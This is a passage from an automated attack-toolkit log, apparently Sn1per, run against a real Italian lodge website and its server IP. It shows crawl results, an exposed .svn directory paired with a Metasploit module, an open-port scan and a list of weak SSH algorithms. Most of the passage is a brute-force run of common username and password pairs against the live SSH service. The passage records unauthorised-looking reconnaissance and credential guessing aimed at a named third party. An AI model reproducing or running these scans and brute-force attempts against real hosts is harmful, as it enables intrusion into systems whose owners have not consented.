  2462. |_[ + ] [ 93 / 100 ]-[11:34:49] [ - ]
  2463. |_[ + ] Target:: [ http://www.granloggiafemminile.it/i-nostri-principi ]
  2464. |_[ + ] Exploit::
  2465. |_[ + ] Information Server:: , , IP::0
  2466. |_[ + ] More details::
  2467. |_[ + ] Found:: UNIDENTIFIED
  2468.  
  2469. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2470. |_[ + ] [ 94 / 100 ]-[11:34:53] [ - ]
  2471. |_[ + ] Target:: [ http://www.granloggiafemminile.it/portfolio-tags/info ]
  2472. |_[ + ] Exploit::
  2473. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2474. |_[ + ] More details:: / - / , ISP:
  2475. |_[ + ] Found:: UNIDENTIFIED
  2476.  
  2477. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2478. |_[ + ] [ 95 / 100 ]-[11:34:58] [ - ]
  2479. |_[ + ] Target:: [ http://www.granloggiafemminile.it/portfolio-category/videos ]
  2480. |_[ + ] Exploit::
  2481. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2482. |_[ + ] More details:: / - / , ISP:
  2483. |_[ + ] Found:: UNIDENTIFIED
  2484.  
  2485. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2486. |_[ + ] [ 96 / 100 ]-[11:35:03] [ - ]
  2487. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/300-anni ]
  2488. |_[ + ] Exploit::
  2489. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2490. |_[ + ] More details:: / - / , ISP:
  2491. |_[ + ] Found:: UNIDENTIFIED
  2492.  
  2493. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2494. |_[ + ] [ 97 / 100 ]-[11:35:07] [ - ]
  2495. |_[ + ] Target:: [ http://www.granloggiafemminile.it/attivita-estere/clipsas ]
  2496. |_[ + ] Exploit::
  2497. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2498. |_[ + ] More details:: / - / , ISP:
  2499. |_[ + ] Found:: UNIDENTIFIED
  2500.  
  2501. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2502. |_[ + ] [ 98 / 100 ]-[11:35:09] [ - ]
  2503. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/massoneria-femminile ]
  2504. |_[ + ] Exploit::
  2505. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2506. |_[ + ] More details:: / - / , ISP:
  2507. |_[ + ] Found:: UNIDENTIFIED
  2508.  
  2509. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2510. |_[ + ] [ 99 / 100 ]-[11:35:13] [ - ]
  2511. |_[ + ] Target:: [ http://www.granloggiafemminile.it/tag/loggia-femminile ]
  2512. |_[ + ] Exploit::
  2513. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.6.2 X-Powered-By: PHP/5.4.45-0+deb7u9, IP:77.238.18.215:80
  2514. |_[ + ] More details:: / - / , ISP:
  2515. |_[ + ] Found:: UNIDENTIFIED
  2516.  
  2517. [ INFO ] [ Shutting down ]
  2518. [ INFO ] [ End of process INURLBR at [25-09-2019 11:35:13]
  2519. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  2520. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.granloggiafemminile.it/output/inurlbr-www.granloggiafemminile.it ]
  2521. |_________________________________________________________________________________________
  2522.  
  2523. \_________________________________________________________________________________________/
  2524. ######################################################################################################################################
  2525. --------------------------------------------------------
  2526. <<<Yasuo discovered following vulnerable applications>>>
  2527. --------------------------------------------------------
  2528. +----------+---------------------------------+----------------------------------------------+----------+----------+
  2529. | App Name | URL to Application | Potential Exploit | Username | Password |
  2530. +----------+---------------------------------+----------------------------------------------+----------+----------+
  2531. | SVN | https://77.238.18.215:443/.svn/ | ./auxiliary/scanner/http/svn_wcdb_scanner.rb | | |
  2532. +----------+---------------------------------+----------------------------------------------+----------+----------+
  2533. ######################################################################################################################################
  2534. Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 11:13 EDT
  2535. Nmap scan report for host1.4marketing.it (77.238.18.215)
  2536. Host is up (0.15s latency).
  2537. Not shown: 425 filtered ports, 56 closed ports
  2538. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2539. PORT STATE SERVICE
  2540. 22/tcp open ssh
  2541. 443/tcp open https
  2542.  
  2543. Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds
  2544. ######################################################################################################################################
  2545. # general
  2546. (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
  2547. (gen) software: OpenSSH 6.0p1
  2548. (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
  2549. (gen) compression: enabled (zlib@openssh.com)
  2550.  
  2551. # key exchange algorithms
  2552. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
  2553. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2554. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
  2555. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2556. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
  2557. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2558. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  2559. `- [info] available since OpenSSH 4.4
  2560. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2561. `- [warn] using weak hashing algorithm
  2562. `- [info] available since OpenSSH 2.3.0
  2563. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  2564. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  2565. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2566. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  2567. `- [warn] using small 1024-bit modulus
  2568. `- [warn] using weak hashing algorithm
  2569. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  2570.  
  2571. # host-key algorithms
  2572. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  2573. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  2574. `- [warn] using small 1024-bit modulus
  2575. `- [warn] using weak random number generator could reveal the key
  2576. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2577. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
  2578. `- [warn] using weak random number generator could reveal the key
  2579. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2580.  
  2581. # encryption algorithms (ciphers)
  2582. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2583. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  2584. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2585. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2586. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2587. `- [warn] using weak cipher
  2588. `- [info] available since OpenSSH 4.2
  2589. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2590. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2591. `- [warn] using weak cipher
  2592. `- [info] available since OpenSSH 4.2
  2593. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2594. `- [warn] using weak cipher mode
  2595. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  2596. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2597. `- [warn] using weak cipher
  2598. `- [warn] using weak cipher mode
  2599. `- [warn] using small 64-bit block size
  2600. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  2601. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2602. `- [fail] disabled since Dropbear SSH 0.53
  2603. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2604. `- [warn] using weak cipher mode
  2605. `- [warn] using small 64-bit block size
  2606. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  2607. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2608. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2609. `- [warn] using weak cipher mode
  2610. `- [warn] using small 64-bit block size
  2611. `- [info] available since OpenSSH 2.1.0
  2612. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2613. `- [warn] using weak cipher mode
  2614. `- [info] available since OpenSSH 2.3.0
  2615. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2616. `- [warn] using weak cipher mode
  2617. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  2618. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2619. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2620. `- [warn] using weak cipher
  2621. `- [info] available since OpenSSH 2.1.0
  2622. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2623. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2624. `- [warn] using weak cipher mode
  2625. `- [info] available since OpenSSH 2.3.0
  2626.  
  2627. # message authentication code algorithms
  2628. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2629. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2630. `- [warn] using encrypt-and-MAC mode
  2631. `- [warn] using weak hashing algorithm
  2632. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2633. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  2634. `- [warn] using weak hashing algorithm
  2635. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2636. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  2637. `- [warn] using small 64-bit tag size
  2638. `- [info] available since OpenSSH 4.7
  2639. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  2640. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2641. (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  2642. `- [warn] using encrypt-and-MAC mode
  2643. `- [info] available since OpenSSH 5.9
  2644. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  2645. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2646. (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  2647. `- [warn] using encrypt-and-MAC mode
  2648. `- [info] available since OpenSSH 5.9
  2649. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2650. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2651. `- [warn] using encrypt-and-MAC mode
  2652. `- [info] available since OpenSSH 2.5.0
  2653. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2654. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2655. `- [warn] using encrypt-and-MAC mode
  2656. `- [info] available since OpenSSH 2.1.0
  2657. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2658. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2659. `- [warn] using encrypt-and-MAC mode
  2660. `- [warn] using weak hashing algorithm
  2661. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  2662. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2663. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2664. `- [warn] using encrypt-and-MAC mode
  2665. `- [warn] using weak hashing algorithm
  2666. `- [info] available since OpenSSH 2.5.0
  2667.  
  2668. # algorithm recommendations (for OpenSSH 6.0)
  2669. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  2670. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  2671. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  2672. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
  2673. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
  2674. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
  2675. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
  2676. (rec) -ssh-dss -- key algorithm to remove
  2677. (rec) -arcfour -- enc algorithm to remove
  2678. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  2679. (rec) -blowfish-cbc -- enc algorithm to remove
  2680. (rec) -3des-cbc -- enc algorithm to remove
  2681. (rec) -aes256-cbc -- enc algorithm to remove
  2682. (rec) -arcfour256 -- enc algorithm to remove
  2683. (rec) -cast128-cbc -- enc algorithm to remove
  2684. (rec) -aes192-cbc -- enc algorithm to remove
  2685. (rec) -arcfour128 -- enc algorithm to remove
  2686. (rec) -aes128-cbc -- enc algorithm to remove
  2687. (rec) -hmac-md5-96 -- mac algorithm to remove
  2688. (rec) -hmac-sha2-256-96 -- mac algorithm to remove
  2689. (rec) -hmac-ripemd160 -- mac algorithm to remove
  2690. (rec) -hmac-sha1-96 -- mac algorithm to remove
  2691. (rec) -umac-64@openssh.com -- mac algorithm to remove
  2692. (rec) -hmac-md5 -- mac algorithm to remove
  2693. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  2694. (rec) -hmac-sha1 -- mac algorithm to remove
  2695. (rec) -hmac-sha2-512-96 -- mac algorithm to remove
  2696. ######################################################################################################################################
  2697. Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 11:13 EDT
  2698. NSE: [ssh-run] Failed to specify credentials and command to run.
  2699. NSE: [ssh-brute] Trying username/password pair: root:root
  2700. NSE: [ssh-brute] Trying username/password pair: admin:admin
  2701. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  2702. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  2703. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  2704. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  2705. NSE: [ssh-brute] Trying username/password pair: guest:guest
  2706. NSE: [ssh-brute] Trying username/password pair: user:user
  2707. NSE: [ssh-brute] Trying username/password pair: web:web
  2708. NSE: [ssh-brute] Trying username/password pair: test:test
  2709. NSE: [ssh-brute] Trying username/password pair: root:
  2710. NSE: [ssh-brute] Trying username/password pair: admin:
  2711. NSE: [ssh-brute] Trying username/password pair: administrator:
  2712. NSE: [ssh-brute] Trying username/password pair: webadmin:
  2713. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  2714. NSE: [ssh-brute] Trying username/password pair: netadmin:
  2715. NSE: [ssh-brute] Trying username/password pair: guest:
  2716. NSE: [ssh-brute] Trying username/password pair: user:
  2717. NSE: [ssh-brute] Trying username/password pair: web:
  2718. NSE: [ssh-brute] Trying username/password pair: test:
  2719. NSE: [ssh-brute] Trying username/password pair: root:123456
  2720. NSE: [ssh-brute] Trying username/password pair: admin:123456
  2721. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  2722. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  2723. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  2724. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  2725. NSE: [ssh-brute] Trying username/password pair: guest:123456
  2726. NSE: [ssh-brute] Trying username/password pair: user:123456
  2727. NSE: [ssh-brute] Trying username/password pair: web:123456
  2728. NSE: [ssh-brute] Trying username/password pair: test:123456
  2729. NSE: [ssh-brute] Trying username/password pair: root:12345
  2730. NSE: [ssh-brute] Trying username/password pair: admin:12345
  2731. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  2732. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  2733. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  2734. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  2735. NSE: [ssh-brute] Trying username/password pair: guest:12345
  2736. NSE: [ssh-brute] Trying username/password pair: user:12345
  2737. NSE: [ssh-brute] Trying username/password pair: web:12345
  2738. NSE: [ssh-brute] Trying username/password pair: test:12345
  2739. NSE: [ssh-brute] Trying username/password pair: root:123456789
  2740. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  2741. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  2742. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  2743. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  2744. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  2745. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  2746. NSE: [ssh-brute] Trying username/password pair: user:123456789
  2747. NSE: [ssh-brute] Trying username/password pair: web:123456789
  2748. NSE: [ssh-brute] Trying username/password pair: test:123456789
  2749. NSE: [ssh-brute] Trying username/password pair: root:password
  2750. NSE: [ssh-brute] Trying username/password pair: admin:password
  2751. NSE: [ssh-brute] Trying username/password pair: administrator:password
  2752. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  2753. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  2754. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  2755. NSE: [ssh-brute] Trying username/password pair: guest:password
  2756. NSE: [ssh-brute] Trying username/password pair: user:password
  2757. NSE: [ssh-brute] Trying username/password pair: web:password
  2758. NSE: [ssh-brute] Trying username/password pair: test:password
  2759. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  2760. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  2761. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  2762. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  2763. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  2764. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  2765. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  2766. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  2767. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  2768. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  2769. NSE: [ssh-brute] Trying username/password pair: root:princess
  2770. NSE: [ssh-brute] Trying username/password pair: admin:princess
  2771. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  2772. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  2773. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  2774. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  2775. NSE: [ssh-brute] Trying username/password pair: guest:princess
  2776. NSE: [ssh-brute] Trying username/password pair: user:princess
  2777. NSE: [ssh-brute] Trying username/password pair: web:princess
  2778. NSE: [ssh-brute] Trying username/password pair: test:princess
  2779. NSE: [ssh-brute] Trying username/password pair: root:12345678
  2780. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  2781. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  2782. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  2783. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  2784. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  2785. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  2786. NSE: [ssh-brute] Trying username/password pair: user:12345678
  2787. NSE: [ssh-brute] Trying username/password pair: web:12345678
  2788. NSE: [ssh-brute] Trying username/password pair: test:12345678
  2789. NSE: [ssh-brute] Trying username/password pair: root:1234567
  2790. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  2791. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  2792. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  2793. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  2794. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  2795. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  2796. NSE: [ssh-brute] Trying username/password pair: user:1234567
  2797. NSE: [ssh-brute] Trying username/password pair: web:1234567
  2798. NSE: [ssh-brute] Trying username/password pair: test:1234567
  2799. NSE: [ssh-brute] Trying username/password pair: root:abc123
  2800. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  2801. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  2802. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  2803. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  2804. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  2805. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  2806. NSE: [ssh-brute] Trying username/password pair: user:abc123
  2807. NSE: [ssh-brute] Trying username/password pair: web:abc123
  2808. NSE: [ssh-brute] Trying username/password pair: test:abc123
  2809. NSE: [ssh-brute] Trying username/password pair: root:nicole
  2810. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  2811. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  2812. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  2813. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  2814. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  2815. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  2816. NSE: [ssh-brute] Trying username/password pair: user:nicole
  2817. NSE: [ssh-brute] Trying username/password pair: web:nicole
  2818. NSE: [ssh-brute] Trying username/password pair: test:nicole
  2819. NSE: [ssh-brute] Trying username/password pair: root:daniel
  2820. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  2821. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  2822. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  2823. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  2824. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  2825. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  2826. NSE: [ssh-brute] Trying username/password pair: user:daniel
  2827. NSE: [ssh-brute] Trying username/password pair: web:daniel
  2828. NSE: [ssh-brute] Trying username/password pair: test:daniel
  2829. NSE: [ssh-brute] Trying username/password pair: root:monkey
  2830. NSE: [ssh-brute] Trying username/password pair: admin:monkey
  2831. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
  2832. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
  2833. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
  2834. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
  2835. NSE: [ssh-brute] Trying username/password pair: guest:monkey
  2836. NSE: [ssh-brute] Trying username/password pair: user:monkey
  2837. NSE: [ssh-brute] Trying username/password pair: web:monkey
  2838. NSE: [ssh-brute] Trying username/password pair: test:monkey
  2839. NSE: [ssh-brute] Trying username/password pair: root:babygirl
  2840. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
  2841. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
  2842. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
  2843. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
  2844. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
  2845. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
  2846. NSE: [ssh-brute] Trying username/password pair: user:babygirl
  2847. NSE: [ssh-brute] Trying username/password pair: web:babygirl
  2848. NSE: [ssh-brute] Trying username/password pair: test:babygirl
  2849. NSE: [ssh-brute] Trying username/password pair: root:qwerty
  2850. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
  2851. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
  2852. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
  2853. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
  2854. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
  2855. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
  2856. NSE: [ssh-brute] Trying username/password pair: user:qwerty
  2857. NSE: [ssh-brute] Trying username/password pair: web:qwerty
  2858. NSE: [ssh-brute] Trying username/password pair: test:qwerty
  2859. NSE: [ssh-brute] Trying username/password pair: root:lovely
  2860. NSE: [ssh-brute] Trying username/password pair: admin:lovely
  2861. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
  2862. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
  2863. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
  2864. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
  2865. NSE: [ssh-brute] Trying username/password pair: guest:lovely
  2866. NSE: [ssh-brute] Trying username/password pair: user:lovely
  2867. NSE: [ssh-brute] Trying username/password pair: web:lovely
  2868. NSE: [ssh-brute] Trying username/password pair: test:lovely
  2869. NSE: [ssh-brute] Trying username/password pair: root:654321
  2870. NSE: [ssh-brute] Trying username/password pair: admin:654321
  2871. NSE: [ssh-brute] Trying username/password pair: administrator:654321
  2872. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
  2873. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
  2874. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
  2875. NSE: [ssh-brute] Trying username/password pair: guest:654321
  2876. NSE: [ssh-brute] Trying username/password pair: user:654321
  2877. NSE: [ssh-brute] Trying username/password pair: web:654321
  2878. NSE: [ssh-brute] Trying username/password pair: test:654321
  2879. NSE: [ssh-brute] Trying username/password pair: root:michael
  2880. NSE: [ssh-brute] Trying username/password pair: admin:michael
  2881. NSE: [ssh-brute] Trying username/password pair: administrator:michael
  2882. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
  2883. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
  2884. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
  2885. NSE: [ssh-brute] Trying username/password pair: guest:michael
  2886. NSE: [ssh-brute] Trying username/password pair: user:michael
  2887. NSE: [ssh-brute] Trying username/password pair: web:michael
  2888. NSE: [ssh-brute] Trying username/password pair: test:michael
  2889. NSE: [ssh-brute] Trying username/password pair: root:jessica
  2890. NSE: [ssh-brute] Trying username/password pair: admin:jessica
  2891. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
  2892. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
  2893. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
  2894. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
  2895. NSE: [ssh-brute] Trying username/password pair: guest:jessica
  2896. NSE: [ssh-brute] Trying username/password pair: user:jessica
  2897. NSE: [ssh-brute] Trying username/password pair: web:jessica
  2898. NSE: [ssh-brute] Trying username/password pair: test:jessica
  2899. NSE: [ssh-brute] Trying username/password pair: root:111111
  2900. NSE: [ssh-brute] Trying username/password pair: admin:111111
  2901. NSE: [ssh-brute] Trying username/password pair: administrator:111111
  2902. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
  2903. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
  2904. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
  2905. NSE: [ssh-brute] Trying username/password pair: guest:111111
  2906. NSE: [ssh-brute] Trying username/password pair: user:111111
  2907. NSE: [ssh-brute] Trying username/password pair: web:111111
  2908. NSE: [ssh-brute] Trying username/password pair: test:111111
  2909. NSE: [ssh-brute] Trying username/password pair: root:ashley
  2910. NSE: [ssh-brute] Trying username/password pair: admin:ashley
  2911. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
  2912. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
  2913. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
  2914. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
  2915. NSE: [ssh-brute] Trying username/password pair: guest:ashley
  2916. NSE: [ssh-brute] Trying username/password pair: user:ashley
  2917. NSE: [ssh-brute] Trying username/password pair: web:ashley
  2918. NSE: [ssh-brute] Trying username/password pair: test:ashley
  2919. NSE: [ssh-brute] Trying username/password pair: root:000000
  2920. NSE: [ssh-brute] Trying username/password pair: admin:000000
  2921. NSE: [ssh-brute] Trying username/password pair: administrator:000000
  2922. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
  2923. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
  2924. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
  2925. NSE: [ssh-brute] Trying username/password pair: guest:000000
  2926. NSE: [ssh-brute] Trying username/password pair: user:000000
  2927. NSE: [ssh-brute] Trying username/password pair: web:000000
  2928. NSE: [ssh-brute] Trying username/password pair: test:000000
  2929. NSE: [ssh-brute] Trying username/password pair: root:iloveu
  2930. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
  2931. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
  2932. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
  2933. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
  2934. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
  2935. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
  2936. NSE: [ssh-brute] Trying username/password pair: user:iloveu
  2937. NSE: [ssh-brute] Trying username/password pair: web:iloveu
